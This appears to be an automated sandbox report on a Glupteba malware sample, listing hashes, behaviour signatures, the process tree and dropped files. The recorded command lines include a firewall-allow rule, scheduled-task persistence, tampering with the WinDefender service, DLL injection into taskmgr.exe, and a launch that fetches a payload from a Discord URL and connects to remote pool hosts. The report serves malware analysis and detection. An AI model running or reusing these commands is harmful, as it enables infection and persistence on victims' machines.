Analysis
-
max time kernel
31s -
max time network
307s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
09/05/2024, 23:12
General
-
Target
89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe
-
Size
4.2MB
-
MD5
d9bddd630d7adb9a53c28f80ca985c39
-
SHA1
fdc88ce8d2422f9fb7748c9fb17189ffbc583a21
-
SHA256
89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6
-
SHA512
6598aaf11c728555503f4f385bc88b4a9eec195022b146a6a22ad77759bdb1d72bffb083c7c514222eb253183b2839778b9f688f7a17aa6e2d84797298c2abda
-
SSDEEP
98304:oaQpezkUMTE1jG98FBE9/5ssyESeegfnf4lyOj6mN9jOyo0hkLNK:oJpe4BEU98Fs/etESKJ46WSVc
Malware Config
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba payload 31 IoCs
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
UPX packed file 19 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 3 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Using powershell.exe command.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 24 IoCs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
-
Suspicious use of WriteProcessMemory 16 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe"C:\Users\Admin\AppData\Local\Temp\89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe"C:\Users\Admin\AppData\Local\Temp\89ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6.exe"2⤵
- Checks for VirtualBox DLLs, possible anti-VM trick
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes4⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll4⤵
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F4⤵
- Creates scheduled task(s)
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)5⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
- Launches sc.exe
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:804⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe4⤵
-
-
-
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
2.0MB
MD51bf850b4d9587c1017a75a47680584c4
SHA175cd4738ffc07f203c3f3356bc946fdd0bcdbe19
SHA256ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955
SHA512ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08
-
Filesize
2.8MB
MD5713674d5e968cbe2102394be0b2bae6f
SHA190ac9bd8e61b2815feb3599494883526665cb81e
SHA256f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057
SHA512e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb
-
Filesize
2.0MB
MD5dcb505dc2b9d8aac05f4ca0727f5eadb
SHA14f633edb62de05f3d7c241c8bc19c1e0be7ced75
SHA25661f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551
SHA51231e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3
-
Filesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
Filesize
2KB
MD5db01a2c1c7e70b2b038edf8ad5ad9826
SHA1540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6
-
Filesize
18KB
MD5f1e81bfa1717b123f894327081dc9e1c
SHA14919850074ac238faee65dbdf056ab5adea4a3dd
SHA256df41f8eeeacaad826aec241e0e9f5ac2807ed305ccf43b25511e2f83c868eae5
SHA5127c94076ff2a6fcc95004070ffe00aff8ece34fd67dc89b5c3694343baf3e306eee17bb955f9f18700deb128aecdb7f708626721041aa7813615cb6bd0aff0fa2
-
Filesize
18KB
MD514854a6a6815b5fc8dcc9b2198c26433
SHA186dda7c8141779a8ee87980c58b7c29f3d687203
SHA256dc8ea1e5ed0e86b60107ac5718f93e477c7e2c0b4ceff2e72a9ad79dfd65a0de
SHA512eb95cc95f3713664dc26f5a4ee0a5a315c54633587aab9d216958c37c25cd304d6d7b1ffcff7c456fc2e7c5b3f3dfa8178b0d96a73bfee173fec7592db8774e5
-
Filesize
18KB
MD5fdaa510ecc2fe89fe23a3f392e8e0037
SHA169b25a8136f8a5946006e1c1d9d6b20502979d51
SHA2564276b932950b48339b7cc7eaf02169f92032b63f2aa36b5f11edfc1bdbb3ce66
SHA51210f26f1ff6775c285bf02a636c3c27880cafbbb28e9928d125d8f112b18d32dc9c620a3e7265e61c573116d96f597cf70ae6a0568df28347bca563974f11afec
-
Filesize
18KB
MD5efbb2eb59b592e313d26d2e8667f556a
SHA11d9f302096ba962dcb65f9180e29fbb818bdd915
SHA25604f995160264f67da40371768bb38ac720f9ec88628f4c955fa0ed50af7eb02d
SHA512e7872966a66d39340b2f9e8f07c12b8a11d4b9d96fba20ef2972210d1dae6623dff25fa67d4b8d255c0f3d180a8a25e14a217a54fd1dbe2d08a3d77172f51e78
-
Filesize
18KB
MD5a2fb1b3436615b5482f6ea1c2c7c99db
SHA10953588fff794dbe3766299c6c4e2b6edf630655
SHA256f2df064f92aa5359288ce1eafe0af01d4d9a697c08185eaec9a7e0d382c0532e
SHA5127735972af4566637f0065c368c0b7ca35512750f11882915aa19ccbd0feea7cfb3784e91a21a71cc93df79ecbc1695bb08c6b61120128948b43b6413dd277bd6
-
Filesize
18KB
MD5ebab4a9d0d313b37adeb042ccc3ca191
SHA1f6b3bb226ea9da339e494dd46da1d47c16b4725a
SHA2560f750f511a851aebdefbb909724e9aabc50cab1aa813f36aa6af35b7ba8edab6
SHA512a08314e3dd0a4080a4ffb1a23a0f96a52451bcc6f06efdc7715e8d03d8908fcb45e7915de7b788b8fca7a7f9622dc6a9783b8dd85d401d51b5113bab30051283
-
Filesize
18KB
MD5a81946f1d4e18a427967d12137b9a455
SHA131e36ff820dcf2559cd951d9b49badea9529a439
SHA2566fe55bed3f25b5279ea33d5c82f50fb7cfcb6edce5fa96b8a530ecef5541261d
SHA5125210a5e4aac75456e3ee9ef360fa5f464a85d739a0092b912035ed8c2e77a7f942f70d1c849a240853401bf75d7d3a685e6b4a77ed23cc8c3030a03379065ce8
-
Filesize
18KB
MD51033c59969145835c9075c852bbd45a4
SHA1dfdee2deafe7a7a2a9152f9ed56c58defceab7cd
SHA256ff2f35b33e162fb5db782e5a09d7511f3a63db12e384a8900be9b1c2ecb7affe
SHA51244e6d610cda9ee4c1e320454fd9a9756a4b903781e86b5ac90a0f7516edbd68e647768fc4c8c61fd7e9def220f2d79d01d873fbf5e722f9299e5f9edf68453ce
-
Filesize
4.2MB
MD5d9bddd630d7adb9a53c28f80ca985c39
SHA1fdc88ce8d2422f9fb7748c9fb17189ffbc583a21
SHA25689ebcab5d2af2d0d283ab5d0ab8d71d4a1c8b4dcf418d0c848922870e339ace6
SHA5126598aaf11c728555503f4f385bc88b4a9eec195022b146a6a22ad77759bdb1d72bffb083c7c514222eb253183b2839778b9f688f7a17aa6e2d84797298c2abda
-
Filesize
2.0MB
MD58e67f58837092385dcf01e8a2b4f5783
SHA1012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA51240d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
660KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
8.8MB
-
Filesize
8.8MB
-
Filesize
8.8MB
-
Filesize
8.8MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
9.1MB
-
Filesize
26.0MB
-
Filesize
8.9MB
-
Filesize
9.1MB
-
Filesize
8.9MB
-
Filesize
4.0MB
-
Filesize
26.0MB
-
Filesize
136KB
-
Filesize
6.9MB
-
Filesize
408KB
-
Filesize
6.9MB
-
Filesize
408KB
-
Filesize
216KB
-
Filesize
3.3MB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
300KB
-
Filesize
240KB
-
Filesize
6.2MB
-
Filesize
472KB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
204KB
-
Filesize
120KB
-
Filesize
6.9MB
-
Filesize
660KB
-
Filesize
592KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
26.0MB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
3.3MB
-
Filesize
300KB
-
Filesize
660KB